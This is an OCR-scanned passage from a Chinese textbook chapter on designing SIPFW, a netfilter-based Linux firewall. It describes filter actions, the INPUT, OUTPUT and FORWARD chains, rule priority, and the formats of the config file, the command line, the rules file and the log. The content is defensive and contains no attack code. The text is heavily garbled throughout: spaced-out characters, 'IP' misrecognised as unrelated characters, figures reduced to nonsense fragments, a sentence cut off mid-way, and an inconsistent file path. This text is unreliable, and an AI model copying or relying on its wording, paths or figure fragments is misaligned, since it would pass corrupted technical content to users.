墙 会 让 网 络 数据 通过 ， 不 对 其 进行 处 理 ， 有 具体 的 处 理 过 程 由 应 用 程序 进行 。 

口 丢弃 动作 通常 用 DROP 表示 ， 当 满足 条 件 的 网 络 数据 到 来 的 时 候 ， 防 火 墙 将 会 将 
网 络 数据 丢弃 ， 防 火 墙 之 后 的 网 络 协议 栈 不 会 进行 处 理 ， 应 用 层 更 不 能 得 到 网 络 
数据 的 任何 信息 。 

口 转发 动作 通常 用 FORWARD 表示 ， 当 满足 条 件 的 网 络 数据 到 来 时 ， 防 火 墙 会 将 到 

来 的 网 络 数据 按照 定义 的 规则 进行 转发 ， 即 把 数据 发 送 给 另 一 个 主机 。 

如 图 20.1 所 示 为 一 个 简单 的 例子 , 从 网 络 上 过 来 的 数据 会 按照 条 件 一 一 动作 的 方式 通 
过 防火 墙 SIPFW。 当 满足 接受 条 件 的 时 候 ， 执 行 接受 的 动作 ， 网 络 数据 直接 通过 防火 墙 ， 
由 网 络 协议 栈 处 理 数据 。 而 当 网 络 数据 满足 丢弃 条 件 的 时 候 ， 防 火 墙 会 将 数据 丢弃 ， 网 络 
数据 不 会 经 过 防火 墙 。 当 网 络 数据 满足 转发 条 件 的 时 候 ，SIPFW 防火 墙 会 将 网 络 数据 进行 
转发 ， 条 件 中 指定 的 另 一 个 主机 将 会 接收 网 络 数据 并 进行 处 理 。 


接受 条 件 一 二 一 -人 9 一 一 一 协议 栈 
光一 =( 刘 协议 栈 


转发 条 件 。 三 一 满足 协议 栈 


一 一 一 丢弃 条 件 


器 风 


另 一 个 主机 


图 20.1 SIPFW 防火 墙 的 条 件 和 动作 


20.2.2 SIPFW 防火 墙 支持 过 滤 的 类 型 和 内 容 


一 般 的 防火 墙 均 提供 过 滤 基 于 多 种 方式 构建 过 滤 规 则 的 能 力 ， 防 火 墙根 据 定义 的 各 种 
不 同 的 规则 进行 网 络 数据 的 过 滤 。 防 火 墙 SIPFW 也 提供 类 似 的 功能 , 例如 可 以 无 条 件 过 滤 、 
根据 耳 地 址 过 滤 、 根 据 协议 类 型 过 滤 ， 根 据 协 议 类 型 的 可 识别 码 或 者 阶段 过 滤 。 


1. 无 条 件 过 滤 
即 防 火 墙 默认 的 过 滤 规 则 ， 当 没有 任何 过 滤 规 则 指定 的 时 候 ， 防 火 墙 提供 一 个 基本 的 
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过 滤 规 则 方案 。SIPFW 防火 墙 的 默认 规则 为 DROP， 即 当 没 有 指定 任何 规则 的 时 候 ， 将 丢 
弃 任 何 网 络 数据 。 

用 户 可 以 在 此 规则 的 基础 上 构建 自己 的 规则 ， 当 用 户 定义 规则 之 后 ， 满 足 用 户 规则 的 
网 络 数据 ， 将 执行 用 户 所 定义 的 规则 处 理 方式 ;如果 不 满足 用 户 定义 的 规则 ， 就 会 执行 默 
认 的 过 滤 规 则 ， 即 SIPFW 所 定义 的 丢弃 规则 。 其 实 可 以 定义 一 个 全 部 ACCEPT 的 规则 来 
履 盖 默认 规则 ， 将 所 有 的 网 络 数据 都 接受 ， 而 不 是 默认 地 丢弃 。 

如 图 20.2 所 示 , 其 中 的 场景 1 为 用 户 没 有 设置 防火 墙 的 情况 , 所 有 由 主机 H 发 送 到 带 
有 防火 墙 SIPFW 的 主机 时 ， 其 网 络 数据 均 被 丢弃 。 


主机 H 主机 H 主机 H 


场景 1 无 条 件 设置 场景 2 用 户 自 定义 了 条 件 场景 3 用 ACCEPT 覆盖 默认 规则 
图 20.2 防火 墙 的 默认 规则 


场景 2 为 用 户 自 定义 了 防火 墙 的 规则 ， 由 主机 H 发 送 到 带 SIPFW 防火 墙 主机 的 网 络 
数据 会 先 查 看 是 否 满足 用 户 自 定义 的 数据 ， 如 果 用 户 自 定义 的 防火 墙 规则 不 满足 ， 则 会 调 
用 防火 墙 的 默认 规则 ， 将 网 络 数据 丢弃 。 如 果 满 足 用 户 的 规则 ， 就 按照 用 户 自 定义 的 规则 
执行 。 

场景 3 为 用 户 自 定义 了 一 套 规则 ， 并 用 一 个 全 部 接受 的 规则 覆盖 默认 的 规则 ， 这 时 ， 
主机 H 发 送 的 网 络 数据 到 达 带 有 SIPFW 防火 墙 的 主机 时 ， 防 火 墙 会 先 查 看 用 户 定义 的 规 
则 是 否 满足 ， 如 果 满 足 就 执行 用 户 自 定义 的 规则 ;如 果 不 满足 则 会 调用 用 户 定义 的 规则 
ACCEPT， 接 受 全 部 的 网 络 数据 ;SIPFW 防火 墙 的 默认 规则 永远 不 会 调用 ， 因 为 之 前 的 接 
受 规则 已 经 会 截取 全 部 到 达 本 机 的 网 络 数据 ， 并 会 满足 所 有 的 条 件 。 

2. 按照 IP 地 址 进行 过 滤 。 

SIPFW 防火 墙 可 以 按照 主机 的 IP 地 址 进行 过 滤 ， 只 有 满足 规则 中 设置 的 IP 地 址 的 主 
机 才能 进行 规定 的 工作 。IP 地 址 分 为 源 主机 IP 地 址 和 目的 主机 人 P 地址, 源 主机 IP 地 址 指 
的 是 发 送 网 络 数据 主机 的 IP 地 址 ， 目 的 主机 IP 地址 指 的 是 接受 数据 主机 人 P 地 址 。 

如 图 20.3 所 示 ， 接 受 动作 的 条 件 为 源 主 机 的 IP 地 址 为 192.168.1.88， 只 有 源 地 址 为 接 
收 条 件 的 网 络 数据 才 会 执行 接受 动作 。 丢 弃 条 件 的 目的 地 址 为 192.168.1.99， 只 有 目的 主 
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机 为 192.168.1.99 的 网 络 数 据 ， 才 会 执行 丢弃 动作 ， 将 网 络 数据 丢弃 。 
ss 满足 =| ”协议 栈 
1 全 二 一 (用 协议 栈 


久光 是 一 (网 态 议 本 
目的 192.168.1.1 


另 一 个 主机 


器 网 


让 


图 20.3 按照 耳 条 件 进行 过 滤 


在 图 20.3 中 还 有 一 种 全 IP 地 址 条 件 ， 即 0， 表 示 所 有 的 主机 IP 地 址 ， 在 转发 条 件 中 
设置 的 条 件 为 “ 源 0， 目 的 192.168.1.1”， 即 网 络 数据 的 发 送 方 为 任意 的 主机 IP、 接 收 方 为 
192.168.1.1， 这 时 SIPFW 防火 墙 会 将 此 数据 进行 转发 。 例 如 ， 发 送 方 为 192.168.1.100、 接 
收 方 为 192.168.1.1 的 网 络 数据 会 被 SIPFW 防火 墙 转发 。 


3. 根据 协议 类 型 过 滤 


SIPFW 防火 墙 可 以 根据 设置 的 网 络 协 议 类 型 进行 过 滤 , 即 只 有 为 某 个 协议 的 网 络 数 据 
才能 执行 相应 的 动作 。SIPFW 所 能 识别 的 协议 为 TCP、UDP、ICMP 和 IGMP， 当 某 个 协 
议 不 能 识别 的 时 候 ， 会 忽略 协议 的 部 分 ， 按 照 无 协议 指定 的 规则 进行 过 滤 条 件 判 定 。 例 如 
某 个 协议 为 ARP 协议 ， 防 火 墙 不 能 识别 此 协议 ， 则 会 查找 过 滤 规 则 中 的 无 协议 规则 ， 例 如 
仅 指定 卫 地 址 的 规则 。 

当 协 议 类 型 规则 没有 指定 IP 地 址 的 时 候 , 过 滤 条 件 为 所 有 的 IP 地址 , 即 卫 地 址 为 0。 
当 协 议 类 型 和 IP 地 址 均 进 行 了 设置 ， 则 仅仅 满足 PP 过 滤 条 件 和 协议 类 型 过 滤 条 件 的 网 络 
数据 才能 执行 相应 的 动作 。 

4. 根据 协议 的 阶段 进行 过 滤 


SIPFW 防火 墙 可 以 根据 TCP 网 络 协议 的 某 个 阶段 进行 过 滤 ， 如 TCP 的 SYN 阶段 和 
FIN 阶段 。 在 TCP 的 三 次 握手 的 第 一 个 阶段 发 送 的 数据 中 , SYN 字段 一 个 客户 端 和 服务 器 
进行 三 次 握手 的 过 程 如 图 20.4 所 示 。 

如 表 20.1 所 示 ， 客 户 端 先 发 送 序列 号 2000 并 将 SYN 字段 设置 为 有 效 ; 服务 器 接收 到 
SYN 字段 后 ， 发 送 服务 器 的 序列 号 1000 和 客户 端 响 应 2001， 并 将 SYN 和 ACK 设置 为 有 
效 ， 最 后 客户 端 对 接收 到 的 服务 器 序号 进行 确认 并 设置 ACK 有 效 。 
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客户 端 服务 器 
TCP 包 
关闭 侦 听 
(close) (listen ) 
发 送 SYN SEO=2000 ,CTL= 接收 SYN 
(syn—send ) 0 (syn—recved) 


建立 连接 =1000,ACK= 局 < 一 接收 SYN 
Cestibiished 7 SEQ-=1000, ACK=2001, CTL=SYNIACK dy 


建立 连接 SEQ=2000,ACK=1001,CTL= ACK 建立 连接 


(established ) (established ) 
图 20.4 TCP 的 三 次 握手 


表 20.1 TCP 的 三 次 握手 过 程 
客 户 端 服 务 器 
1 发 送 SYN 请 求 (seq=x) 接收 到 SYN 
2 接收 到 SYN/ACK 发 送 SYN(seq=y)，ACK(x+1) 
3 发 送 ACK(y+1) 接收 到 ACK， 连 接 建立 
xX: 客户 端的 初始 化 序列 号 
y :服务器 端的 初始 化 序列 号 


为 了 能 够 有 效 地 拦截 一 个 TCP 连接 ， 可 以 将 服务 器 上 SIPFW 防火 墙 的 过 滤 条 件 设置 
为 TCP 协议 的 SYN 阶段 , 即 在 客户 端 发 送 SYN 字段 的 时 候 就 进行 过 滤 ， 使 得 服务 器 端的 
网 络 协议 栈 接收 不 到 SYN 数据 , 这 样 就 不 会 对 其 他 数据 造成 影响 , 例如 客户 端的 其 他 TCP 

5. 协议 的 类 型 和 代码 

SIPFW 防火 墙 可 以 根据 ICMP 和 IGMP 协议 的 代码 和 类 型 进行 过 滤 。ICMP 协议 和 
IGMP 协议 有 很 多 类 型 和 代码 ， 并 且 其 功能 比较 重要 ， 如 果 不 区 分 具体 的 类 型 和 代码 而 全 
部 进行 过 滤 ， 将 会 造成 很 大 的 麻烦 。 

例如 ， 为 了 阻止 别 的 主机 对 本 机 进行 的 ping 操作 ， 而 将 所 有 的 ICMP 进行 拦截 ， 将 会 
将 “主机 不 可 达 ” 等 有 用 的 信息 屏蔽 掉 ， 使 得 网 络 协议 很 不 完整 。 
20.2.3 SIPFW 防火 墙 过 滤 的 方式 和 动作 

防火 墙 的 过 滤 方 式 是 防火 墙 设计 的 重要 部 分 ， 本 节 将 对 SIPFW 的 过 滤 方 式 进行 介绍 ， 
主要 包括 防火 墙 的 3 个 链 、 防 火 墙 的 规则 增加 所 引起 的 规则 优先 级 变化 等 需求 的 定义 。 
SIPFW 防火 墙 分 为 3 个 链 : INPUT、OUTPUT 和 FORWARD， 如 图 20.5 所 示 。3 个 链 的 含 


义 和 处 理 方式 如 下 : 
口 INPUT 是 防火 墙 的 输入 链 ， 即 进入 主机 的 网 络 数据 都 会 经 过 防火 墙 的 这 个 链 ， 在 
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这 个 链 上 查找 可 以 匹配 的 规则 ， 并 按照 规则 指定 的 方式 进行 处 理 。 
口 OUTPUT 是 防火 墙 的 输出 链 , 即 从 主机 发 出 的 网 络 数据 都 会 经 过 防火 墙 的 这 个 链 ， 
可 以 将 对 从 主机 发 出 的 网 络 数据 过 滤 规 则 放 到 这 个 链 上 ， 由 这 个 链 进行 命中 规则 
查找 ， 当 命中 的 时 候 ， 在 这 个 链 上 对 网 络 数据 按照 定义 的 动作 进行 处 理 。 
口 FORWARD 为 防火 墙 的 转发 链 ， 即 主机 进行 转发 的 数据 都 会 经 过 转发 链 ， 如 果 需 
要 对 转发 的 网 络 数据 进行 过 滤 ， 将 规则 放 到 FORWARD 链 上 。 
防火 墙 的 3 个 链 由 各 种 规则 组 成 , 其 中 的 规则 构成 为 链表 结构 , 如 图 20.6 所 示 , 由 “ 规 
则 1” 可 以 得 到 “规则 2”， 当 进行 过 滤 规 则 命中 判定 的 时 候 ， 需 要 遍历 整个 链表 结构 。 如 
果 规 则 命中 则 停止 对 链表 中 规则 的 遍历 。 


网 络 


FORWARD OUTPUT 规则 1 
规则 2 
1 
规则 n-1 
网 络 协议 栈 
规则 n 


图 20.5 ”SIPFW 防火 墙 的 3 个 链 图 20.6 SIPFW 防火 墙 规则 的 链表 结构 


图 20.6 所 示 的 链表 结构 隐 含 了 一 个 规则 ， 因 为 遍历 链表 的 时 候 ， 只 要 找到 一 个 规则 就 
停止 遍历 , 所 以 前 面 规则 的 优先 级 要 高 于 后 面 的 规则 。 SIPFW 防火 墙 为 了 强调 用 户 的 动作 ， 
将 用 户 新 加 入 的 规则 放 到 链 的 最 前 面 , 这 样 查找 规则 的 时 候 就 会 先 找到 用 户 新 加 入 的 规则 ， 
即 用 户 新 加 入 的 规则 的 优先 级 总 是 最 高 的 优先 级 。 


20.2.4 SIPFW 防火 墙 的 配置 文件 


SIPFW 防火 墙 在 防火 墙 启动 的 时 候 需 要 读 取 防 火 墙 的 基本 配置 ， 例 如 默认 配置 规则 、 
规则 配置 文件 的 路 径 、 日 志文 件 的 路 径 等 信息 ， 用 于 初始 化 防火 墙 的 配置 。 

SIPFW 防火 墙 配置 文件 的 路 径 为 “/etc/sipfw.conf”， 配 置 文件 的 格式 如 下 : 

[# 1 关键 字 = 值 ] 

配置 文件 的 一 行文 字 为 注释 行 或 者 为 配置 行 。 当 一 行 的 第 一 个 字符 为 # 的 时 候 ， 表 示 
本 行为 注释 ，SIPFW 防火 墙 将 忽略 本 行 的 配置 信息 ， 不 继续 进行 解析 。 
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配置 行 的 格式 为 “关键 字 = 值 ”， 其 中 “关键 字 ” 为 配置 的 指示 ， 表 示 配 置 行 的 含义 ; 
“ 值 ” 为 配置 行 指示 配置 选项 是 什么 。 配 置 文件 的 选项 即 “ 关 键 字 ”有 如 下 几 个 。 

口 DefaultAction: 默认 动作 ， 即 防火 墙 没 有 设置 规则 时 对 网 络 数据 的 处 理 方式 ， 可 以 
为 ACCEPT 或 者 DROP 两 种 之 一 。 如 果 没 有 配置 此 项 ， 默 认 值 为 DROP， 即 将 所 
有 的 网 络 数据 丢弃 掉 。 

口 RulesFile: 防火 墙 规则 配置 文件 的 路 径 , 防火墙 将 从 此 文件 中 读 取 防火 墙 的 配置 规 
则 。 如 果 此 项 没有 进行 配置 ， 将 从 文件 “/etc/sipfw.rules” 文 件 中 读 取 防 火 墙 配置 
规则 。 

口 LogFile: 防火 墙 日 志文 件 的 路 径 ， 防 火 墙 将 把 过 滤 规 则 的 命中 情况 放 到 这 个 文件 
中 。 如 果 此 项 没有 进行 配置 ， 将 向 文件 “/etc/sipfw.log” 中 写 入 命中 情况 。 


各 注意 : 如 果 防 火 墙 配 置 文件 “/etc/sipfw.conf” 不 存在 ， 将 会 建立 一 个 “/etc/sipfw.conf” 
文件 ， 并 将 上 述 默 认 的 配置 信息 写 入 文件 。 


20.2.5 SIPFW 防火 墙 命令 行 配置 格式 


防火 墙 的 命令 行 配 置 是 用 户 设置 防火 墙 的 基本 方法 。 例 如 iptables 防火 墙 可 以 通过 命 
令 行 进 行规 则 的 增加 、 删 除 、 保 存 、 恢 复 、 列 表 、 清 空 等 操作 。 与 iptables 防火 墙 的 功能 
相似 ，SIPFW 防火 墙 也 可 以 进行 命令 行 参数 配置 操作 ， 包 括 增加 规则 、 删 除 规则 等 操作 。 
对 于 防火 墙 规则 的 读 取 和 保存 ， 是 一 种 隐 式 的 操作 , 即 SIPF W 在 进行 防火 墙 规则 设置 、 删 
除 的 时 候 会 动态 地 写 入 硬盘 ， 所 以 不 需要 显 式 进行 防火 墙 规则 的 读 取 和 保存 操作 。 
SIPFW 防火 墙 的 命令 行 配置 的 命令 格式 定义 如 下 : 
sipfw --chain chain --action act --source from[-to] --dest from[-to] --sport 
from[-to] --dport from[-to] --protocol protocol --interface ifacename 
配置 选项 的 含义 如 下 所 述 。 
口 --chain chan: --chain 为 操作 的 选项 ， 后 面 的 chan 为 选项 的 值 。 操 作 的 链 ， 即 操作 
所 生效 的 链 的 名 称 ， 将 要 把 此 规则 动作 添加 到 指定 的 链 上 ， 链 分 为 3 个 : INPUT、 
OUTPUT 和 FORWARD。 其 中 INPUT 链 用 于 处 理 从 外 部 进行 本 地 的 网 络 数据 ; 
OUTPUT 链 用 于 处 理 本 地 主机 发 送出 的 网 络 数据 ， FORWARD 链 用 于 处 理 经 由 本 
地 转发 的 网 络 数据 。 
口 --action act: --action 为 操作 的 选项 ， 后 面 的 act 为 选项 的 值 。 规 则 定义 的 动作 ， 符 
合 规则 定义 的 网 络 数据 将 按照 给 定 的 act 动作 来 操作 。 有 ACCEPT、DROP， 其 中 
ACCEPT 动作 会 接收 符合 规则 定义 的 网 络 数据 ， DROP 动作 会 丢弃 符合 规则 定义 
的 网 络 数据 。 
口 --source from[-to]: --source 为 操作 的 选项 ， 后 面 的 fom 和 to 为 选项 的 值 。 规 则 定 
义 所 制定 的 网 络 数据 来 源 主机 的 耳 地 址 ， 其 中 from 为 点 分 四 段 式 的 下 地 址 ， 例 
如 192.168.1.100。 要 表示 一 个 地 址 范围 ， 即 多 个 主机 地 址 中 间 需 要 使 用 “,” 隔 开 ， 
例如 “192.168.1.100,192.168.1.202,192.168.1.254” 表 示 3 个 主机 。 如 果 需 要 表示 一 
个 连续 的 主机 地 址 段 需要 用 “-” 隔 开 ， 例 如 “192.168.1.1-192.168.1.254” 表 示 从 
主机 192.168.1.1 到 主机 192.168.1.254 共 254 个 主机 地 址 都 放 入 规则 。 当 来 源 的 卫 
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地 址 设置 为 0 的 时 候 ， 表 示 所 有 的 来 源 主机 均 在 此 规则 涵盖 范围 内 。 

口 --dest from[-to]: --dest 为 操作 的 选项 ， 后 面 的 fom 和 to 为 选项 的 值 。 规 则 所 定义 
的 网 络 数据 的 目的 IP 地 址 ， 目 的 了 P 地 址 中 的 from 等 选项 的 含义 与 源 地 址 中 的 含 
义 相同 。 

口 --sport from[-to]: --sport 为 操作 的 选项 ， 后 面 的 fom 和 to 为 选项 的 值 。 表 示 规 则 
所 定义 的 网 络 数据 来 源 主机 的 端口 地 址 。 其 中 from 为 十 进 制 表示 的 端口 地 址 ， 例 
如 “--sport 8080” 表 示 源 主机 的 端口 地 址 为 8080。 要 表示 多 个 源 端 口 范围 ， 中 间 
需要 使 用 “,” 隔 开 ， 例 如 “--sport 80,110” 表 示 源 端口 80 和 110。 当 需要 表示 一 
段 端口 地 址 的 时 候 要 有 “-” 将 起 始 端口 和 结束 端口 连 起 来 ， 例 如 “--sport 80-100” 
表示 从 端口 80 到 端口 100 之 间 的 所 有 端口 。 当 来 源 端口 只 设置 为 0 的 时 候 ， 表 示 
所 有 的 来 源 端口 ， 均 在 此 规则 涵盖 范围 内 。 

口 --dport from[-to]: --dport 为 操作 的 选项 ， 后 面 的 from 和 to 为 选项 的 值 。 表 示 规 
则 所 定义 的 网 络 数据 目的 地 址 的 端口 ， 其 中 from 和 to 的 含义 与 --sport 中 的 含义 
相同 。 

口 --protocol protocol: --protocol 为 操作 的 选项 ， 后 面 的 protocol 为 选项 的 值 。 表 示 规 
则 定义 所 指 的 协议 类 型 ， 可 以 支持 TCP、UDP、ICMP 和 IGMP 选项 ，TCP 表示 
TCP 协议 ， 用 字符 串 tcp 代表 ; UDP 表示 UDP 协议 ， 用 字符 串 udp 表示 ; ICMP 
表示 ICMP 协议 ， 用 字符 串 icmp 表示 ; IGMP 表示 IGMP， 用 字符 串 igmp 代表 。 
当 值 为 0 的 时 候 表示 支持 所 有 上 述 4 种 协议 类 型 。 

口 --interface ifacename: --interface 为 操作 的 网 络 接口 ， 后 面 的 ifacename 为 网 络 接口 
的 名 称 。 表 示 规 则 定义 所 绑 定 的 网 络 接口 ， 目 前 仅仅 支持 以 太 网 的 接口 ， 例 如 回 
环 接口 lo， 以 太 网 接口 eth0 等 。 选 项 值 ifacename 的 值 与 ifonfig 所 列 出 的 网 络 接 
口 的 名 称 一 致 ， 可 以 为 lo、eth0 或 者 wlan0 等 ， 当 没有 指定 此 项 的 时 候 ， 将 对 所 
有 的 网 络 接口 都 适用 此 规则 。 

口 --delete: 此 项 操作 不 带 参 数 ， 将 删除 指定 规则 。 所 删除 规则 有 其 他 选项 设置 ， 删 
除 的 选项 必须 与 之 前 增加 的 选项 完全 一 致 才 发 生 删除 动作 。 

口 --flush: 此 项 操作 不 带 任何 其 他 参数 ， 将 清空 SIPFW 防火 墙 中 的 所 有 过 滤 规 则 ， 
此 后 如 果 马 上 有 网 络 数据 到 达 ， 将 会 按照 默认 的 规则 进行 处 理 ， 即 丢弃 掉 全 部 到 
来 的 网 络 数据 。 

口 --list: 此 项 操作 列 出 指定 链 上 的 过 滤 规 则 设置 情况 。 操 作 方式 为 “--list chain” 其 
中 的 chain 可 以 为 输入 (INPUT) 、 输 出 〈OUTPUT) 和 转发 (FORWARD) 。 当 
不 带 参 数 的 时 候 ， 将 需要 列 出 所 有 链 上 的 规则 设置 情况 ， 即 列 出 输入 、 输 出 和 转 
发 3 个 链 的 规则 。 

20.2.6 SIPFW 防火 墙 的 规则 文件 格式 

防火 墙 SIPFW 规则 配置 文件 用 于 保存 防火 墙 过 滤 规 则 的 配置 情况 ,在 防火 墙 启动 的 时 
候 ， 从 配置 文件 中 读 取 防火 墙 配置 参数 ， 生 成 防火 墙 的 配置 规则 。 当 用 户 对 防火 墙 的 配置 
规则 进行 了 修改 之 后 ， 防 火 墙 配置 文件 的 记录 将 进行 实时 更 新 。 

防火 墙 配置 文件 的 默认 路 径 为 “/etc/sipfwrules”， 防 火 墙 启动 的 时 候 ， 将 从 配置 文件 
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中 读 取 规则 文件 的 数据 。 如 果 默 认 路 径 下 没有 规则 配置 文集 ， 防 火 墙 将 创建 一 个 ， 并 将 配 
置 的 规则 在 此 处 进行 更 新 。 

防火 墙 配 置 文件 的 格式 和 其 他 配置 文件 的 规则 基本 一 致 。 防 火 墙 配置 文件 由 多 行 组 
成 ， 每 行 一 条 规则 ， 规 则 不 能 换行 。 防 火 墙 配置 文件 采用 严格 的 解析 方式 ， 在 各 个 条 件 的 
中 间 没 有 多 余 的 空格 。 每 行 配置 规则 的 格式 如 下 : 

[#1 目标 链 动作 源 IP 源 端口 目的 IP 目的 端口 协议 类 型 网 络 接口 ] 


每 一 行 的 规则 由 关键 字 目 标 链 、 动 作 、 源 全、 源 端口 、 目 的 全 、 目 的 端口 和 协议 类 型 组 
成 ， 在 各 关键 字 之 间 由 一 个 空格 隔 开 ， 不 能 有 多 余 的 空格 。 在 每 行 的 开头 和 结尾 均 不 支持 空 
格 ， 每 行 的 结尾 为 “\n” 或 者 “\rn”， 最 后 一 行 可 以 没有 换行 符 ， 直 接 为 “协议 类 型 ”结束 。 
配置 文件 每 行规 则 的 含义 如 下 所 述 。 


口 


口 


#: 此 关键 字 表示 此 行为 注释 行 ， 进 行规 则 解析 的 时 候 ， 将 忽略 此 行规 则 所 定义 的 
内 容 。 关 键 字 # 必 须 位 于 一 行 的 第 一 个 字符 。 

目标 链 : 此 关键 字 为 当前 行规 则 所 操作 的 链 ， 即 操作 所 生效 的 链 的 名 称 ， 将 要 把 
此 规则 动作 到 指定 的 链 上 ， 链 分 为 3 个 ,INPUT、OUTPUT 和 FORWARD。 其 中 
INPUT 链 用 于 处 理 从 外 部 进行 本 地 的 网 络 数据 ; OUTPUT 链 用 于 处 理 本 地 主机 发 
送出 的 网 络 数据 ; FORWARD 链 用 于 处 理 经 由 本 地 转发 的 网 络 数据 。 

动作 : 此 关键 字 为 当前 行规 则 的 动作 ， 符 合 规则 定义 的 网 络 数据 将 按照 给 定 的 act 
动作 来 操作 ， 有 ACCEPT、DROP。 其 中 ACCEPT 动作 会 接收 符合 规则 定义 的 网 
络 数据 ， DROP 动作 会 丢弃 符合 规则 定义 的 网 络 数据 。 

源 IP: 此 关键 字 表示 当前 行规 则 定义 中 网 络 数据 的 主机 IP 地 址 范围 。 格 式 为 
“[[from][,tol1,to2...|-to]]”， 分 为 3 种 情况 ， 第 1 种 为 仅 包含 fom， 表 示 源 卫 地 
址 为 单个 的 主机 IP 地 址 ，from 为 点 分 四 段 式 的 IP 地 址 ， 例 如 “192.168.1.100”; 
第 2 种 为 包含 多 个 不 连续 的 源 主机 人 P 地 址 , 多 个 主机 地 址 中 间 需 要 使 用 “,” 隔 开 ， 
例如 字符 串 “192.168.1.100,192.168.1.202,192.168.1.254” 表 示 3 个 主机 ; 第 3 种 为 
包含 连续 的 源 主机 IP 地 址 ， 在 开始 IP 地址 和 结束 卫 地 址 之 间 需 要 用 “-” 隔 开 ， 
例如 “192.168.1.1-192.168.1.254” 表 示 从 主机 192.168.1.1 到 主机 192.168.1.254 共 
254 个 主机 地 址 都 放 入 规则 。 当 来 源 的 IP 地 址 设置 为 0 的 时 候 ， 表 示 所 有 的 来 源 
主机 均 在 此 规则 涵盖 范围 内 。 

源 端口 : 此 关键 字 表示 当前 行规 则 定义 中 发 送 网 络 数据 的 主机 端口 地 址 。 格 式 为 
“[[from]Ltol,to2...|-to]l]”， 分 为 3 种 情况 ， 第 1 种 为 仅 包含 fom， 表 示 源 端口 地 
址 为 单个 的 主机 的 端口 地 址 ，from 为 单一 的 端口 地 址 , 例如 80 表示 源 主机 的 端口 
地 址 为 80; 第 2 种 为 包含 多 个 不 连续 的 源 主机 端口 地 址 ， 多 个 主机 端口 地 址 之 间 
间 需 要 使 用 “,” 隔 开 ， 例 如 字符 串 “80,110,23 ”表示 某 主机 的 3 个 端口 地 址 ， 第 
3 种 为 包含 连续 的 源 主 机 端口 地 址 ， 在 开始 端口 地 址 和 结束 端口 地 址 之 间 需 要 用 
“-” 隔 开 ， 例 如 “80-8080” 表 示 从 主机 端口 80 到 主机 端口 地 址 8080 共 8001 个 
主机 端口 地 址 都 放 入 规则 。 当 来 源 的 端口 地 址 设置 为 0 的 时 候 ， 表 示 来 源 主 机 所 
有 的 端口 地 址 均 在 此 规则 涵盖 范围 内 。 

目的 卫 : 此 关键 字 表 示 当 前 行规 则 定义 中 的 接收 网 络 数据 的 主机 人 P 地 址 。 目的 他 
的 格式 与 “ 源 IP” 项 一 致 ， 都 为 “[[from][tol,to2...|-tol]]”。 
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口 目的 端口 : 此 关键 字 表示 当前 行规 则 定义 中 的 接收 网 络 数据 的 主机 端口 地 址 。 目 
的 端口 地 址 的 格式 定义 与 “ 源 端口 ”项 一 致 ， 都 为 “[[from][tol,to2...|-to]]”。 

口 协议 类 型 : 此 关键 字 表 示 当 前 行规 则 定义 中 网 络 数据 的 协议 类 型 ， 可 以 支持 TCP、 
UDP、ICMP 和 IGMP 协议 类 型 。 其 中 TCP 协议 用 字符 串 tcp 代表 ; UDP 协议 用 
字符 串 udp 表示 ; ICMP 协议 用 字符 串 icmp 表示 ; IGMP 协议 用 字符 串 igmp 代表 。 
当 值 为 0 的 时 候 表示 支持 所 有 上 述 4 种 协议 类 型 。 

口 网 络 接口 : 规则 所 指定 的 网 络 设备 接口 ， 含 义 与 命令 行 配置 的 ifacename 一 致 。 

例如 有 如 下 的 一 个 配置 文件 位 于 “/etc/sipfw.rules”， 定 义 了 如 下 儿 条 规则 : 


#confuration file for firewall SIPFW 
INPUT DROP 192.168.1.100 0 0 0 icmp eth0 
OUTPUT DROP 0 0 192.168.1.88 23 tcp 


全 注意 : 规则 的 含义 为 第 1 行为 一 个 注释 行 ， 解析 的 时 候 将 忽略 此 行 的 含义 。 第 2 行 表示 
所 有 经 过 网 络 接口 eth0 从 主机 192.168.1.100 发 送 的 ICMP 协议 包 网 络 数据 在 进 
入 本 机 的 时 候 均 丢弃 。 第 3 行 表示 从 本 机 发 送 到 主机 192.168.1.88 目的 端口 为 23 
的 TCP 协议 均 丢 弃 。 


20.2.7 ”SIPFW 防火 墙 的 日 志文 件数 据 格式 


防火 墙 日 志文 件 记 录 防 火 墙 规则 的 命中 情况 ， 规 则 为 用 户 定义 的 规则 ， 不 包含 默认 规 
则 的 命中 情况 ， 主 要 是 因为 默认 规则 的 命中 比较 多 ， 会 造成 日 志文 件 的 无 限 增 大 。 

防火 墙 日 志文 件 的 路 径 将 从 防火 墙 配 置 文件 中 读 取 ， 如 果 配 置 文件 中 没有 配置 此 项 ， 
将 从 路 径 “/etc/sipfw.log” 的 文件 中 读 取 ， 并 将 命中 规则 写 入 此 文件 中 。 

日 志文 件 的 一 行为 注释 或 者 命中 规则 ， 防 火 墙 日 志文 件 的 格式 如 下 : 

[HI 时 间 Erom 源 TB: 源 喘 口 to 目的 二 :目的 端口 协议 类 型 动作 】 


当 一 行 的 开头 为 # 的 时 候 表 示 为 注释 ， 和 否则 此 行为 防火 墙 的 命中 规则 。 命 中 规则 的 含 
义 为 “在 什么 时 间 从 源 地 址 : 源 地 址 端口 到 目的 IP 地 址 : 目的 地 址 端口 的 某 种 协议 ， 防 火 
墙 对 其 的 处 理 方式 ”。 其 中 的 含义 与 前 面 规则 定义 文件 中 的 含义 一 致 。 


20.2.8 SIPFW 防火 墙 构建 所 采用 的 技术 方案 


防火 墙 的 设计 除了 规则 之 外 ， 技 术 框架 的 选取 十 分 关键 。 在 Linux 操作 系统 上 ， 有 一 
个 成 功 的 网 络 数 据 过 滤 框 架 ， 这 就 是 netfilter， 并 有 基于 netfilter 的 防火 墙 iptables 。 


1. SIPFW 防火 墙 的 内 核 过 滤 架 构 的 选择 


SIPFW 防火 墙 也 是 采用 netfilter 的 5 个 钧 子 实 现 ， 如 图 20.7 所 示 。SIPFW 防火 墙 选取 
netfilter 中 5 个 钩子 中 的 3 个 作为 实现 防火 墙 网 络 数据 截取 的 基础 : NF_IP_LOCAL IN、 
NF IP_ LOCAL OUT 和 NF_IP_ FORWARD， 分 别 对 应 于 防火 墙 的 INPUT、OUTPUT 和 
FORWARD 链 。 

netfilter 防火 墙 架构 的 5 个 钧 子 的 概念 ， 在 第 17 章 中 已 经 进行 了 比较 详细 的 介绍 ， 本 
章 不 再 说 明 , 读者 可 以 参考 第 17 章 中 的 内 容 。 当 在 上 述 的 3 个 钩子 上 截取 了 网 络 数据 的 时 
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网 名 
_ 网 络 数据 | Penounsd -| 路 由 下 oo NF_IP_POST_ROUTING 上 一 一 


[1 


路 由 
下 


NEF_IP_LOCAL_IN 


NF_IP_LOCAL-OUT 
下 


